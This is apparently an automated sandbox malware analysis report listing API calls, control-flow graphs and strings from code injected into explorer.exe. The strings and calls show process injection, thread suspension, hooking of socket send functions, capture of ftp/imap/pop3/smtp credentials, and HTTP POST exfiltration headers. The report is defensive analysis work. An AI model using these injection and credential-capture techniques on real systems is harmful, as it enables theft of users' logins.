                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                • String ID: 0-FwP,Fw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                                                • API String ID: 1066286714-483016567
                                                                                                                                                                • Opcode ID: a005a2237ea5a496f71cd07a057d58b853aba9f30f5ff2ef48949e75c10e8ac0
                                                                                                                                                                • Instruction ID: afb63e241b6246a6b6cb852ae8e5e5ab3937bd1eb7c88d0b8e6ab7905aaaba6f
                                                                                                                                                                • Opcode Fuzzy Hash: a005a2237ea5a496f71cd07a057d58b853aba9f30f5ff2ef48949e75c10e8ac0
                                                                                                                                                                • Instruction Fuzzy Hash: 5F61AC71205354AFD320DF25AC88F6FBBECEF98750F040619F94992691DA74DE058BA2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00C2265A
                                                                                                                                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00C22672
                                                                                                                                                                • lstrlen.KERNEL32(?,00000000), ref: 00C2267A
                                                                                                                                                                • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00C22685
                                                                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00C2269F
                                                                                                                                                                • wsprintfA.USER32 ref: 00C226B6
                                                                                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 00C226CF
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C226D9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                • String ID: %02X
                                                                                                                                                                • API String ID: 3341110664-436463671
                                                                                                                                                                • Opcode ID: abc5e0e10c85363eb3bbd61624909ffd55795ee71ac7bfef88b99182de320a7f
                                                                                                                                                                • Instruction ID: b68a12a944bbfbacb72181ecee63df9634bfa0090a699be4c5e6abbdb20d3b7d
                                                                                                                                                                • Opcode Fuzzy Hash: abc5e0e10c85363eb3bbd61624909ffd55795ee71ac7bfef88b99182de320a7f
                                                                                                                                                                • Instruction Fuzzy Hash: FF112B72A00148BFDB219B99EC88FAEBFBCEB44741F104065F605E2550DA794F169B70

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 422 c21b17-c21b2c 423 c21b60-c21b68 422->423 424 c21b2e 422->424 426 c21bc3-c21bcb 423->426 427 c21b6a-c21b6f 423->427 425 c21b30-c21b5e RtlMoveMemory 424->425 425->423 425->425 428 c21c0b 426->428 429 c21bcd-c21bdf 426->429 430 c21bbe-c21bc1 427->430 433 c21c0d-c21c12 428->433 429->428 432 c21be1-c21bfe LdrProcessRelocationBlock 429->432 430->426 431 c21b71-c21b84 LoadLibraryA 430->431 435 c21c15-c21c17 431->435 436 c21b8a-c21b8f 431->436 432->428 434 c21c00-c21c04 432->434 434->428 437 c21c06-c21c09 434->437 435->433 438 c21bb6-c21bb9 436->438 437->428 437->432 439 c21b91-c21b95 438->439 440 c21bbb 438->440 441 c21b97-c21b9a 439->441 442 c21b9c-c21b9f 439->442 440->430 443 c21ba1-c21bab GetProcAddress 441->443 442->443 443->435 444 c21bad-c21bb3 443->444 444->438
                                                                                                                                                                APIs
                                                                                                                                                                • RtlMoveMemory.NTDLL(?,?,?), ref: 00C21B4E
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,00C24434,00000000,00000000,75572EE0,00000000,00C21910,?,?,?,00000001,?,00000000), ref: 00C21B76
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00C21BA3
                                                                                                                                                                • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00C21BF4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3827878703-0
                                                                                                                                                                • Opcode ID: a5351494bb1b39d8fec55bc27e7b9cc218947aa480361e81f6433d662ce63254
                                                                                                                                                                • Instruction ID: dfb42a37622de5fc850b577f13edaf58b6fa10855e3b86f6ae6767c7f4e5594d
                                                                                                                                                                • Opcode Fuzzy Hash: a5351494bb1b39d8fec55bc27e7b9cc218947aa480361e81f6433d662ce63254
                                                                                                                                                                • Instruction Fuzzy Hash: EA31A175700225AFCB24CF29D884B76B7E8EF25315B18456CEC96C7A00EB35E946CBA0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
                                                                                                                                                                  • Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,00C2109E,?,00C21010), ref: 00C2134A
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000003,?,00C2109E,?,00C21010), ref: 00C2135B
                                                                                                                                                                • wsprintfA.USER32 ref: 00C21372
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00C2265A
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00C22672
                                                                                                                                                                  • Part of subcall function 00C2263E: lstrlen.KERNEL32(?,00000000), ref: 00C2267A
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00C22685
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00C2269F
                                                                                                                                                                  • Part of subcall function 00C2263E: wsprintfA.USER32 ref: 00C226B6
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptDestroyHash.ADVAPI32(?), ref: 00C226CF
                                                                                                                                                                  • Part of subcall function 00C2263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C226D9
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00C21389
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00C2138F
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00C213A1
                                                                                                                                                                  • Part of subcall function 00C224D5: GetCurrentProcessId.KERNEL32 ref: 00C224E7
                                                                                                                                                                  • Part of subcall function 00C224D5: GetCurrentThreadId.KERNEL32 ref: 00C224EF
                                                                                                                                                                  • Part of subcall function 00C224D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C224FF
                                                                                                                                                                  • Part of subcall function 00C224D5: Thread32First.KERNEL32(00000000,0000001C), ref: 00C2250D
                                                                                                                                                                  • Part of subcall function 00C224D5: CloseHandle.KERNEL32(00000000), ref: 00C22566
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 00C213B8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00C213BF
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 00C213E4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00C213EB
                                                                                                                                                                  • Part of subcall function 00C21DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00C21E1D
                                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00C2141D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                                                • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                                                • API String ID: 706757162-1430290102
                                                                                                                                                                • Opcode ID: 9e0eebb2310cd63c092847d9eb3ae64b358d47b0da066f7ed9d03b3bab682adc
                                                                                                                                                                • Instruction ID: a840bec1613e5a7ced4326a881aef58bbd3e8ecbcf43048450541e4c7d7eb3e1
                                                                                                                                                                • Opcode Fuzzy Hash: 9e0eebb2310cd63c092847d9eb3ae64b358d47b0da066f7ed9d03b3bab682adc
                                                                                                                                                                • Instruction Fuzzy Hash: 78318631340274BBCB257FA0FC0AF6E3B55AF55B01F044024FA0996DA1CFB98A129BA0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 236 c21647-c2165a 237 c21660-c21662 236->237 238 c21748-c2174f 236->238 237->238 239 c21668-c2166b 237->239 239->238 240 c21671-c2167d lstrlen 239->240 241 c21683-c2168a lstrlen 240->241 242 c21747 240->242 241->242 243 c21690-c216a8 getpeername 241->243 242->238 243->242 244 c216ae-c216ca inet_ntoa htons 243->244 244->242 245 c216cc-c216d4 244->245 246 c216d6-c216d9 245->246 247 c21708 245->247 248 c216f3-c216f8 246->248 249 c216db-c216de 246->249 250 c2170d-c2173c call c22861 wsprintfA call c224ae 247->250 248->250 251 c216e0-c216e3 249->251 252 c21701-c21706 249->252 250->242 260 c2173e-c21745 call c22843 250->260 254 c216e5-c216ea 251->254 255 c216fa-c216ff 251->255 252->250 254->248 257 c216ec-c216f1 254->257 255->250 257->242 257->248 260->242
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                                                • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                                                • API String ID: 3379139566-1703351401
                                                                                                                                                                • Opcode ID: 2a8eb82c419638ac0ef5da0e02a193bcfd7cff4dcce6a497404b380e645faf53
                                                                                                                                                                • Instruction ID: ceda50a2fd966d8eabe7ef2320d1c0ddb87298ddf1b2f3a7d11c48ba808cf43b
                                                                                                                                                                • Opcode Fuzzy Hash: 2a8eb82c419638ac0ef5da0e02a193bcfd7cff4dcce6a497404b380e645faf53
                                                                                                                                                                • Instruction Fuzzy Hash: 8F21FC32E00269ABDF105EBEAC4467E7AB99BA5701B0C4075EC14D3D11CA75CF019B60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 268 c21752-c21774 GetModuleHandleA GetProcAddress 269 c217c1-c217c6 268->269 270 c21776-c217c0 RtlZeroMemory * 4 268->270 270->269
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00C21539,?,?,?,00C2144B,?), ref: 00C21763
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00C2176A
                                                                                                                                                                • RtlZeroMemory.NTDLL(00C24228,00000104), ref: 00C21788
                                                                                                                                                                • RtlZeroMemory.NTDLL(00C24118,00000104), ref: 00C21790
                                                                                                                                                                • RtlZeroMemory.NTDLL(00C24330,00000104), ref: 00C21798
                                                                                                                                                                • RtlZeroMemory.NTDLL(00C24000,00000104), ref: 00C217A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                                                • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                                                • API String ID: 1490332519-278825019
                                                                                                                                                                • Opcode ID: 56c881c4bf3434043495e856d810179040e445c8e2ab6551da34d8e6366e16dc
                                                                                                                                                                • Instruction ID: 59a5cd7d976efedc666b75baf6621596c1044608c495764edb6d829c11afe0c2
                                                                                                                                                                • Opcode Fuzzy Hash: 56c881c4bf3434043495e856d810179040e445c8e2ab6551da34d8e6366e16dc
                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0AE72B8037CB3823463AB7C06E4FBD5CC591FE63030171BA0463D41CC9969014AF4

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00C224E7
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C224EF
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C224FF
                                                                                                                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 00C2250D
                                                                                                                                                                • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 00C2252C
                                                                                                                                                                • SuspendThread.KERNEL32(00000000), ref: 00C2253C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C2254B
                                                                                                                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 00C2255B
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C22566
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1467098526-0
                                                                                                                                                                • Opcode ID: c745d2d52ff348dd6c2a4de76d02f70ad0dec472ce299c3be9f0d45a042c6046
                                                                                                                                                                • Instruction ID: 6764e6dadac09c646a1577e7407b13668aab31cdc6d158160d37db14f823407d
                                                                                                                                                                • Opcode Fuzzy Hash: c745d2d52ff348dd6c2a4de76d02f70ad0dec472ce299c3be9f0d45a042c6046
                                                                                                                                                                • Instruction Fuzzy Hash: 43118E71514290EFD7209F60AC0CB6EBFA8FF85B01F004529FA4192550D7388A0A9BB2

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 282 c21f4a-c21fa5 call c222b8 call c22861 call c227e2 call c22374 291 c21fc0-c21fcc 282->291 292 c21fa7-c21fbe 282->292 295 c21fd0-c21fd2 291->295 292->295 296 c222a6-c222b5 call c22843 295->296 297 c21fd8-c2200f RtlZeroMemory 295->297 301 c22015-c22030 297->301 302 c2229e-c222a5 297->302 303 c22062-c22074 301->303 304 c22032-c22043 call c222e5 301->304 302->296 309 c22078-c2207a 303->309 310 c22056 304->310 311 c22045-c22054 304->311 313 c22080-c220dc call c22731 309->313 314 c2228b-c22291 309->314 312 c22058-c22060 310->312 311->312 312->309 322 c220e2-c220e7 313->322 323 c22284 313->323 316 c22293-c22295 call c22843 314->316 317 c2229a 314->317 316->317 317->302 324 c22101-c2212f call c22861 wsprintfW 322->324 325 c220e9-c220fa 322->325 323->314 328 c22131-c22133 324->328 329 c22148-c2215f 324->329 325->324 330 c22134-c22137 328->330 335 c22161-c22197 call c22861 wsprintfW 329->335 336 c2219e-c221b8 329->336 331 c22142-c22144 330->331 332 c22139-c2213e 330->332 331->329 332->330 334 c22140 332->334 334->329 335->336 340 c22261-c22277 call c22843 336->340 341 c221be-c221d1 336->341 349 c22280 340->349 350 c22279-c2227b call c22843 340->350 341->340 344 c221d7-c221ed call c22861 341->344 351 c221ef-c221fa 344->351 349->323 350->349 353 c2220e-c22225 351->353 354 c221fc-c22209 call c22826 351->354 358 c22227 353->358 359 c22229-c22236 353->359 354->353 358->359 359->351 360 c22238-c2223c 359->360 361 c22256-c2225d call c22843 360->361 362 c2223e 360->362 361->340 363 c2223e call c22815 362->363 365 c22243-c22250 RtlMoveMemory 363->365 365->361
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00C22861: GetProcessHeap.KERNEL32(00000008,0000A000,00C210CC), ref: 00C22864
                                                                                                                                                                  • Part of subcall function 00C22861: RtlAllocateHeap.NTDLL(00000000), ref: 00C2286B
                                                                                                                                                                  • Part of subcall function 00C227E2: lstrlen.KERNEL32(00C240DA,?,00000000,00000000,00C21F86,75568A60,00C240DA,00000000), ref: 00C227EA
                                                                                                                                                                  • Part of subcall function 00C227E2: MultiByteToWideChar.KERNEL32(00000000,00000000,00C240DA,00000001,00000000,00000000), ref: 00C227FC
                                                                                                                                                                  • Part of subcall function 00C22374: RtlZeroMemory.NTDLL(?,00000018), ref: 00C22386
                                                                                                                                                                • RtlZeroMemory.NTDLL(?,0000003C), ref: 00C21FE2
                                                                                                                                                                • wsprintfW.USER32 ref: 00C2211B
                                                                                                                                                                • wsprintfW.USER32 ref: 00C22186
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00C22250
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                                • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                                • API String ID: 4204651544-1701262698
                                                                                                                                                                • Opcode ID: 2402b40b359f5aa3c9f51bd53438d7493f6e3de9b0c44b6d2f84301b768bc1de
                                                                                                                                                                • Instruction ID: 40a2b05af5a5d3e9ce8a8f0a009c1d28a033099aa82b1eb355e785e666748d98
                                                                                                                                                                • Opcode Fuzzy Hash: 2402b40b359f5aa3c9f51bd53438d7493f6e3de9b0c44b6d2f84301b768bc1de
                                                                                                                                                                • Instruction Fuzzy Hash: 49A16971608351AFD3209F68E885B2FBBE8EB88350F10082DF995D3661DA75DE058B62

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 367 c225ad-c225c9 OpenProcess 368 c22600-c22607 367->368 369 c225cb-c225da IsWow64Process 367->369 370 c225f7 369->370 371 c225dc-c225ec IsWow64Process 369->371 372 c225f9-c225fa CloseHandle 370->372 371->372 373 c225ee-c225f5 371->373 372->368 373->372
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,7556E800,?,?,microsoftedgecp.exe,00C21287), ref: 00C225BF
                                                                                                                                                                • IsWow64Process.KERNEL32(000000FF,?), ref: 00C225D1
                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?), ref: 00C225E4
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C225FA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C21000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_14_2_c21000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                • String ID: microsoftedgecp.exe
                                                                                                                                                                • API String ID: 331459951-1475183003
                                                                                                                                                                • Opcode ID: 9fb0f6dfbff2fc317cb828abb5a0d862c2738ff9c056d081aec0957616a9bc4f
                                                                                                                                                                • Instruction ID: 8045b6754d1609264a40eeba23dee0cb00ab85e681334920c42c8c1631affa40
                                                                                                                                                                • Opcode Fuzzy Hash: 9fb0f6dfbff2fc317cb828abb5a0d862c2738ff9c056d081aec0957616a9bc4f
                                                                                                                                                                • Instruction Fuzzy Hash: 2CF0B47291226CFF9B30CF90AD88AEEB76CEF01351B14426AF91092540D7354F05E6B0

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:8.2%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:9
                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                execution_graph 853 359fab 854 35a1f3 853->854 855 359fd8 853->855 858 35a048 855->858 859 35a04d 858->859 860 35a135 LoadLibraryA 859->860 861 35a190 VirtualProtect VirtualProtect 859->861 863 359ff8 859->863 860->859 862 35a1e8 861->862 862->862

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_003540B4 1 Function_00351BB0 2 Function_003514B2 3 Function_00352CB8 5 Function_00351838 3->5 11 Function_00351D20 3->11 56 Function_00351860 3->56 4 Function_00351938 6 Function_00354124 7 Function_003540A4 8 Function_003545A7 9 Function_00353220 9->1 9->4 9->5 14 Function_00351C28 9->14 34 Function_00351C08 9->34 44 Function_00351B70 9->44 58 Function_00352860 9->58 10 Function_00352620 12 Function_00353020 20 Function_00352E98 12->20 12->44 13 Function_00351822 15 Function_00359FAB 81 Function_0035A048 15->81 16 Function_00352010 22 Function_00351A04 16->22 17 Function_0035141D 18 Function_0035409C 19 Function_00352418 19->5 19->56 67 Function_00352054 19->67 20->3 20->22 36 Function_00352E08 20->36 41 Function_00352BF4 20->41 46 Function_00352B70 20->46 66 Function_00351DD4 20->66 21 Function_00351405 23 Function_00354084 24 Function_00351000 25 Function_00352E80 26 Function_00354000 27 Function_00354180 28 Function_0035188C 28->5 29 Function_0035408C 30 Function_0035410C 31 Function_0035B00C 32 Function_00351508 33 Function_00351A88 35 Function_00352508 55 Function_003524E0 35->55 70 Function_003518D0 35->70 74 Function_003525C4 35->74 36->19 36->56 62 Function_003518E8 36->62 69 Function_00351D50 36->69 37 Function_00353088 37->20 37->44 38 Function_00354188 39 Function_0035A00A 40 Function_00352774 42 Function_00354074 43 Function_00351576 45 Function_00351E70 46->5 46->22 47 Function_003530F0 47->5 47->33 47->35 47->56 73 Function_00351C58 47->73 48 Function_0035B0F0 49 Function_003525FC 50 Function_0035407C 51 Function_003514F9 52 Function_003518F8 53 Function_0035417A 54 Function_003540E4 56->44 57 Function_00351560 58->10 58->40 58->44 59 Function_0035156C 60 Function_0035406C 61 Function_003540EC 63 Function_0035B0E8 64 Function_00351254 65 Function_003514D4 66->5 67->4 67->5 67->16 67->28 67->45 67->52 67->56 67->70 77 Function_00351F40 67->77 68 Function_003540D4 69->5 71 Function_0035355C 71->5 71->9 71->44 71->47 71->71 72 Function_003540DC 74->49 75 Function_00354144 76 Function_00354A41 77->5 77->52 78 Function_003540CC 79 Function_0035414C 80 Function_0035424C 81->39

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 119 35355c-35356c call 351b70 122 353572-3535a5 call 351838 119->122 123 3535fc-353601 119->123 127 3535a7 call 351838 122->127 128 3535d1-3535f6 NtUnmapViewOfSection 122->128 130 3535ac-3535c5 127->130 132 353608-353617 call 353220 128->132 133 3535f8-3535fa 128->133 130->128 139 353621-35362a 132->139 140 353619-35361c call 35355c 132->140 133->123 135 353602-353607 call 3530f0 133->135 135->132 140->139
                                                                                                                                                                APIs
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL ref: 003535D8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Offset: 00351000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_351000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SectionUnmapView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 498011366-0
                                                                                                                                                                • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                • Instruction ID: 6dd68fa012ac581c1483df5f7fd873147cb85a74b6b53a498646e1917687239d
                                                                                                                                                                • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                • Instruction Fuzzy Hash: 0B11C430615E095FEB59BBB8989DB7937A0EB15303F54052AAC1ACB6B1EB398A44C701

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 353220-35325b call 351838 3 353261-353273 CreateToolhelp32Snapshot 0->3 4 353549-353554 SleepEx 3->4 5 353279-35328f Process32First 3->5 4->3 6 353538-35353a 5->6 7 353294-3532ac 6->7 8 353540-353543 CloseHandle 6->8 10 3532b2-3532c6 7->10 11 35348c-353495 call 351bb0 7->11 8->4 10->11 15 3532cc-3532e0 10->15 16 35349b-3534a4 call 351c08 11->16 17 35352a-353532 Process32Next 11->17 15->11 22 3532e6-3532fa 15->22 16->17 21 3534aa-3534b1 call 351c28 16->21 17->6 21->17 26 3534b3-3534c1 call 351b70 21->26 22->11 27 353300-353314 22->27 26->17 31 3534c3-353525 call 351938 call 352860 call 351938 26->31 27->11 32 35331a-35332e 27->32 31->17 32->11 35 353334-353348 32->35 35->11 40 35334e-353362 35->40 40->11 44 353368-35337c 40->44 44->11 46 353382-353396 44->46 46->11 48 35339c-3533b0 46->48 48->11 50 3533b6-3533ca 48->50 50->11 52 3533d0-3533e4 50->52 52->11 54 3533ea-3533fe 52->54 54->11 56 353404-353418 54->56 56->11 58 35341a-35342e 56->58 58->11 60 353430-353444 58->60 60->11 62 353446-35345a 60->62 62->11 64 35345c-353470 62->64 64->11 66 353472-353486 64->66 66->11 66->17
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, Offset: 00351000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_351000_explorer.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2482764027-0
                                                                                                                                                                • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                • Instruction ID: e7b3e5bed0e63463666c6a80763a507e543cd786837986f320a2fb85aad2b0eb
                                                                                                                                                                • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                • Instruction Fuzzy Hash: 528121312186088FE717EF55EC58FEAB7A5FB51781F45462AA842C7170EF78DA08CB81

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
